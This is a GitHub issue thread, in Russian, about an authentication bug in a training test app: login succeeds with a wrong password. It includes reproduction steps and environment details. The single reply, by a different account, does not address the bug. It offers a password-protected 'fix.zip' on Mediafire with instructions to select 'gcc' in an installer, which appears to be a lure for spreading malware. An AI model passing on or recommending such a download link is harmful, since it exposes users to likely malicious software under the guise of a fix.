### ISSUE TITLE
Успешный вход в личный кабинет с неверным паролем

### ISSUE THREAD

**Issue by SergGrebnev** [SergGrebnev/automation_basics_2_3_2_Patterns#1]
# Описание
Должен быть невозможен вход в личный кабинет зарегистрированного активного пользователя с неверным паролем.

# Шаги воспроизведения
1. Запустить приложение командой java -jar ./artifacts/app-ibank.jar -P:profile=test
2. Открыть веб-интерфейс приложения http://localhost:9999
3. Создать и зарегистрировать активного пользователя методом  getRegisteredUser("active") класса  DataGenerator. RegistrationDto
4. Создать случайный пароль методом getRandomPassword()
5. Войти в личный кабинет под именем зарегистрированного пользователя со случайным (неверным) паролем
*Ожидаемый результат:* Отображается сообщение о неверном пароле. Личный кабинет не открывается.
*Фактический результат:* Переход в личный кабинет.

# Скриншот
![image](https://github.com/user-attachments/assets/d866b79a-3e35-48c7-a8f3-65a8365408f7)

# Тест
https://github.com/SergGrebnev/automation_basics_2_3_2_Patterns/blob/9c9d0c06d466c5a3604e3b8a153e797b17662027/src/test/java/ru/netology/testmode/test/AuthTest.java#L107-L125

# Окружение
* **Операционная система** Windows 11
* **IDE** IntelliJ IDEA 2024.2.0.1 (Community Edition)
* **Java** corretto-18.0.2

[Ссылка на исходники проекта на GitHub](https://github.com/SergGrebnev/automation_basics_2_3_2_Patterns)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
